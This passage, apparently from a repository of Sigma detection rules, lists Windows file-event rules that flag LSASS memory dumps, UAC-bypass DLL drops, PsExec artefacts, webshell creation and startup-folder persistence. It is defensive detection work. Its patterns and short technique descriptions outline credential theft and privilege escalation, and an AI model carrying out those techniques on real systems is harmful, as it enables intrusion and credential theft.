'\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json'\n    condition: selection\nfalsepositives:\n    - Some false positives may occur with admin scripts that set WT settings.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_susp_winsxs_binary_creation.yml",
    "content": "title: WinSxS Executable File Creation By Non-System Process\nid: 34746e8c-5fb8-415a-b135-0abc167e912a\nrelated:\n    - id: 64827580-e4c3-4c64-97eb-c72325d45399\n      type: derived\nstatus: test\ndescription: Detects the creation of binaries in the WinSxS folder by non-system processes\nreferences:\n    - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-11\ntags:\n    - attack.execution\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\WinSxS\\'\n        TargetFilename|endswith: '.exe'\n    filter_main_system_location:\n        Image|startswith:\n            - 'C:\\Windows\\Systems32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_adexplorer_dump_written.yml",
    "content": "title: ADExplorer Writing Complete AD Snapshot Into .dat File\nid: 0a1255c5-d732-4b62-ac02-b5152d34fb83\nrelated:\n    - id: 9212f354-7775-4e28-9c9f-8f0a4544e664\n      type: similar\nstatus: experimental\ndescription: Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.\nreferences:\n    - https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer\n    - https://github.com/c3c/ADExplorerSnapshot.py/tree/f700904defac330802bbfedd1d8ffd9248f4ee24\n    - https://www.packetlabs.net/posts/scattered-spider-is-a-young-ransomware-gang-exploiting-large-corporations/\n    - https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/\n    - https://trustedsec.com/blog/adexplorer-on-engagements\nauthor: Arnim Rupp (Nextron Systems), Thomas Patzke\ndate: 2025-07-09\ntags:\n    - attack.discovery\n    - attack.t1087.002\n    - attack.t1069.002\n    - attack.t1482\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\ADExp.exe'\n            - '\\ADExplorer.exe'\n            - '\\ADExplorer64.exe'\n            - '\\ADExplorer64a.exe'\n        TargetFilename|endswith: '.dat'\n    condition: selection\nfalsepositives:\n    - Legitimate use of ADExplorer by administrators creating .dat snapshots\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml",
    "content": "title: LiveKD Kernel Memory Dump File Created\nid: 814ddeca-3d31-4265-8e07-8cc54fb44903\nstatus: test\ndescription: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-16\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\livekd.dmp'\n    condition: selection\nfalsepositives:\n    - In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary.\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver.yml",
    "content": "title: LiveKD Driver Creation\nid: 16fe46bb-4f64-46aa-817d-ff7bec4a2352\nstatus: test\ndescription: Detects the creation of the LiveKD driver, which is used for live kernel debugging\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-16\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\System32\\drivers\\LiveKdD.SYS'\n        Image|endswith:\n            - '\\livekd.exe'\n            - '\\livek64.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of LiveKD for debugging purposes will also trigger this\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml",
    "content": "title: LiveKD Driver Creation By Uncommon Process\nid: 059c5af9-5131-4d8d-92b2-de4ad6146712\nrelated:\n    - id: 16fe46bb-4f64-46aa-817d-ff7bec4a2352\n      type: similar\nstatus: test\ndescription: Detects the creation of the LiveKD driver by a process image other than \"livekd.exe\".\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-16\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\System32\\drivers\\LiveKdD.SYS'\n    filter_main_legit_name:\n        Image|endswith:\n            - '\\livekd.exe'\n            - '\\livek64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrators might rename LiveKD before its usage which could trigger this. Add additional names you use to the filter\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml",
    "content": "title: Process Explorer Driver Creation By Non-Sysinternals Binary\nid: de46c52b-0bf8-4936-a327-aace94f94ac6\nstatus: test\ndescription: |\n    Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.\n    Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer\n    - https://github.com/Yaxser/Backstab\n    - https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks\n    - https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\PROCEXP'\n        TargetFilename|endswith: '.sys'\n    filter_main_process_explorer:\n        Image|endswith:\n            - '\\procexp.exe'\n            - '\\procexp64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some false positives may occur with legitimate renamed process explorer binaries\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml",
    "content": "title: Process Monitor Driver Creation By Non-Sysinternals Binary\nid: a05baa88-e922-4001-bc4d-8738135f27de\nstatus: test\ndescription: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains: '\\procmon'\n        TargetFilename|endswith: '.sys'\n    filter_main_process_explorer:\n        Image|endswith:\n            - '\\procmon.exe'\n            - '\\procmon64.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Some false positives may occur with legitimate renamed process monitor binaries\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_psexec_service.yml",
    "content": "title: PsExec Service File Creation\nid: 259e5a6a-b8d2-4c38-86e2-26c5e651361d\nrelated:\n    - id: 42c575ea-e41e-41f1-b248-8093c3e82a28\n      type: derived\nstatus: test\ndescription: Detects default PsExec service filename which indicates PsExec service installation and execution\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Thomas Patzke\ndate: 2017-06-12\nmodified: 2022-10-26\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\PSEXESVC.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_sysinternals_psexec_service_key.yml",
    "content": "title: PSEXEC Remote Execution File Artefact\nid: 304afd73-55a5-4bb9-8c21-0b1fc84ea9e4\nstatus: test\ndescription: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system\nreferences:\n    - https://aboutdfir.com/the-key-to-identify-psexec/\n    - https://twitter.com/davisrichardg/status/1616518800584704028\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-21\nmodified: 2023-02-23\ntags:\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1136.002\n    - attack.t1543.003\n    - attack.t1570\n    - attack.s0029\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\PSEXEC-'\n        TargetFilename|endswith: '.key'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml",
    "content": "title: Potential Privilege Escalation Attempt Via .Exe.Local Technique\nid: 07a99744-56ac-40d2-97b7-2095967b0e03\nstatus: test\ndescription: Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"\nreferences:\n    - https://github.com/binderlabs/DirCreate2System\n    - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt\nauthor: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)\ndate: 2022-12-16\nmodified: 2022-12-19\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith:\n            - 'C:\\Windows\\System32\\logonUI.exe.local'\n            - 'C:\\Windows\\System32\\werFault.exe.local'\n            - 'C:\\Windows\\System32\\consent.exe.local'\n            - 'C:\\Windows\\System32\\narrator.exe.local'\n            - 'C:\\Windows\\System32\\wermgr.exe.local'\n        TargetFilename|endswith: '\\comctl32.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml",
    "content": "title: LSASS Process Memory Dump Creation Via Taskmgr.EXE\nid: 69ca12af-119d-44ed-b50f-a47af0ebc364\nstatus: test\ndescription: Detects the creation of an \"lsass.dmp\" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-10-19\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - ':\\Windows\\system32\\taskmgr.exe'\n            - ':\\Windows\\SysWOW64\\taskmgr.exe'\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\lsass'\n            - '.DMP'\n    condition: selection\nfalsepositives:\n    - Rare case of troubleshooting by an administrator or support that has to be investigated regardless\nlevel: high\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml",
    "content": "title: Hijack Legit RDP Session to Move Laterally\nid: 52753ea4-b3a0-4365-910d-36cff487b789\nstatus: test\ndescription: Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder\nauthor: Samir Bousseaden\nreferences:\n    - Internal Research\ndate: 2019-02-21\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\mstsc.exe'\n        TargetFilename|contains: '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml",
    "content": "title: UAC Bypass Using Consent and Comctl32 - File\nid: 62ed5b55-f991-406a-85d9-e8e8fdf18789\nstatus: test\ndescription: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\consent.exe.@'\n        TargetFilename|endswith: '\\comctl32.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml",
    "content": "title: UAC Bypass Using .NET Code Profiler on MMC\nid: 93a19907-d4f9-4deb-9f91-aac4692776a6\nstatus: test\ndescription: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith: '\\AppData\\Local\\Temp\\pe386.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml",
    "content": "title: UAC Bypass Using EventVwr\nid: 63e4f530-65dc-49cc-8f80-ccfa95c69d43\nstatus: test\ndescription: Detects the pattern of a UAC bypass using Windows Event Viewer\nreferences:\n    - https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw\n    - https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g\n    - https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute\nauthor: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)\ndate: 2022-04-27\nmodified: 2022-11-22\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            # Removed the start just in case the logging backend doesn't expand ENV variables when they're used\n            - '\\Microsoft\\Event Viewer\\RecentViews'\n            - '\\Microsoft\\EventV~1\\RecentViews'\n    filter:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml",
    "content": "title: UAC Bypass Using IDiagnostic Profile - File\nid: 48ea844d-19b1-4642-944e-fe39c2cc1fec\nstatus: test\ndescription: Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique\nreferences:\n    - https://github.com/Wh04m1001/IDiagnosticProfileUAC\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-03\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\DllHost.exe'\n        TargetFilename|startswith: 'C:\\Windows\\System32\\'\n        TargetFilename|endswith: '.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml",
    "content": "title: UAC Bypass Using IEInstal - File\nid: bdd8157d-8e85-4397-bb82-f06cc9c71dbb\nstatus: test\ndescription: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image: 'C:\\Program Files\\Internet Explorer\\IEInstal.exe'\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\'\n        TargetFilename|endswith: 'consent.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml",
    "content": "title: UAC Bypass Using MSConfig Token Modification - File\nid: 41bb431f-56d8-4691-bb56-ed34e390906f\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith: '\\AppData\\Local\\Temp\\pkgmgr.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml",
    "content": "title: UAC Bypass Using NTFS Reparse Point - File\nid: 7fff6773-2baa-46de-a24a-b6eec1aba2d1\nstatus: test\ndescription: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith: '\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml",
    "content": "title: UAC Bypass Abusing Winsat Path Parsing - File\nid: 155dbf56-e0a4-4dd0-8905-8a98705045e8\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith:\n            - '\\AppData\\Local\\Temp\\system32\\winsat.exe'\n            - '\\AppData\\Local\\Temp\\system32\\winmm.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml",
    "content": "title: UAC Bypass Using Windows Media Player - File\nid: 68578b43-65df-4f81-9a9b-92f32711a951\nstatus: test\ndescription: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection1:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith: '\\AppData\\Local\\Temp\\OskSupport.dll'\n    selection2:\n        Image: 'C:\\Windows\\system32\\DllHost.exe'\n        TargetFilename: 'C:\\Program Files\\Windows Media Player\\osk.exe'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml",
    "content": "title: VHD Image Download Via Browser\nid: 8468111a-ef07-4654-903b-b863a80bbc95\nstatus: test\ndescription: |\n    Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\n    Malware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-october-2021/\n    - https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/\n    - https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/\nauthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'\ndate: 2021-10-25\nmodified: 2023-05-05\ntags:\n    - attack.resource-development\n    - attack.t1587.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\iexplore.exe'\n            - '\\maxthon.exe'\n            - '\\MicrosoftEdge.exe'\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n            - '\\opera.exe'\n            - '\\safari.exe'\n            - '\\seamonkey.exe'\n            - '\\vivaldi.exe'\n            - '\\whale.exe'\n        # We don't use \"endswith\" to also match with ADS logs and \".vhdx\". Example: \"TargetFilename: C:\\Users\\xxx\\Downloads\\windows.vhd:Zone.Identifier\"\n        TargetFilename|contains: '.vhd'\n    condition: selection\nfalsepositives:\n    - Legitimate downloads of \".vhd\" files would also trigger this\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml",
    "content": "title: Visual Studio Code Tunnel Remote File Creation\nid: 56e05d41-ce99-4ecd-912d-93f019ee0b71\nstatus: test\ndescription: |\n    Detects the creation of file by the \"node.exe\" process in the \".vscode-server\" directory. Could be a sign of remote file creation via VsCode tunnel feature\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\ntags:\n    - attack.command-and-control\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|contains: '\\servers\\Stable-'\n        Image|endswith: '\\server\\node.exe'\n        TargetFilename|contains: '\\.vscode-server\\data\\User\\History\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml",
    "content": "title: Renamed VsCode Code Tunnel Execution - File Indicator\nid: d102b8f5-61dc-4e68-bd83-9a3187c67377\nstatus: test\ndescription: |\n    Detects the creation of a file with the name \"code_tunnel.json\" which indicate execution and usage of VsCode tunneling utility by an \"Image\" or \"Process\" other than VsCode.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\ntags:\n    - attack.command-and-control\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\code_tunnel.json'\n    filter_main_legit_name:\n        # Note: There might be other legitimate names for VsCode. Please add them if found\n        Image|endswith:\n            - '\\code-tunnel.exe'\n            - '\\code.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml",
    "content": "title: Potential Webshell Creation On Static Website\nid: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9\nstatus: test\ndescription: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.\nreferences:\n    - PT ESC rule and personal experience\n    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md\nauthor: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo\ndate: 2019-10-22\nmodified: 2023-10-15\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_wwwroot_path:\n        TargetFilename|contains: '\\inetpub\\wwwroot\\'\n    selection_wwwroot_ext:\n        TargetFilename|contains:\n            - '.ashx'\n            - '.asp'\n            - '.ph'\n            - '.soap'\n    selection_htdocs_path:\n        TargetFilename|contains:\n            - '\\www\\'\n            - '\\htdocs\\'\n            - '\\html\\'\n    selection_htdocs_ext:\n        TargetFilename|contains: '.ph'\n    # selection_tomcat_path:\n    #     TargetFilename|contains: '\\webapps\\ROOT'\n    # selection_tomcat_ext:\n    #     TargetFilename|contains:\n    #         - '.jsp' # .jspx, .jspf\n    #         - '.jsv'\n    #         - '.jsw'\n    filter_main_temp:  # FP when unpacking some executables in $TEMP\n        TargetFilename|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Windows\\Temp\\'\n    filter_main_system:\n        Image: 'System' # FP when backup/restore from drivers\n    filter_main_legitimate:\n        TargetFilename|contains: '\\xampp'\n    condition: (all of selection_wwwroot_* or all of selection_htdocs_*) and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate administrator or developer creating legitimate executable files in a web application folder\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml",
    "content": "title: Creation of WerFault.exe/Wer.dll in Unusual Folder\nid: 28a452f3-786c-4fd8-b8f2-bddbe9d616d1\nstatus: test\ndescription: Detects the creation of a file named \"WerFault.exe\" or \"wer.dll\" in an uncommon folder, which could be a sign of WerFault DLL hijacking.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/\nauthor: frack113\ndate: 2022-05-09\nmodified: 2025-12-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\WerFault.exe'\n            - '\\wer.dll'\n    filter_main_known_locations:\n        TargetFilename|startswith:\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Windows\\UUS\\arm64\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_winrar_file_creation_in_startup_folder.yml",
    "content": "title: WinRAR Creating Files in Startup Locations\nid: 74a2b37d-fea4-41e0-9ac7-c9fbcf1f60cc\nstatus: experimental\ndescription: |\n    Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder.\n    This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088.\nreferences:\n    - https://github.com/mulwareX/CVE-2025-6218-POC\n    - https://x.com/0x534c/status/1944694507787710685\n    - https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-16\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\WinRAR.exe'\n            - '\\Rar.exe'\n        TargetFilename|contains: '\\Start Menu\\Programs\\Startup\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml",
    "content": "title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File\nid: d353dac0-1b41-46c2-820c-d7d2561fc6ed\nrelated:\n    - id: 074e0ded-6ced-4ebd-8b4d-53f55908119d\n      type: derived\nstatus: test\ndescription: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)\nreferences:\n    - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-06\nmodified: 2022-11-28\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    system_files:\n        TargetFilename|endswith:\n            - 'WsmPty.xsl'\n            - 'WsmTxt.xsl'\n    in_system_folder:\n        TargetFilename|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: system_files and not in_system_folder\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml",
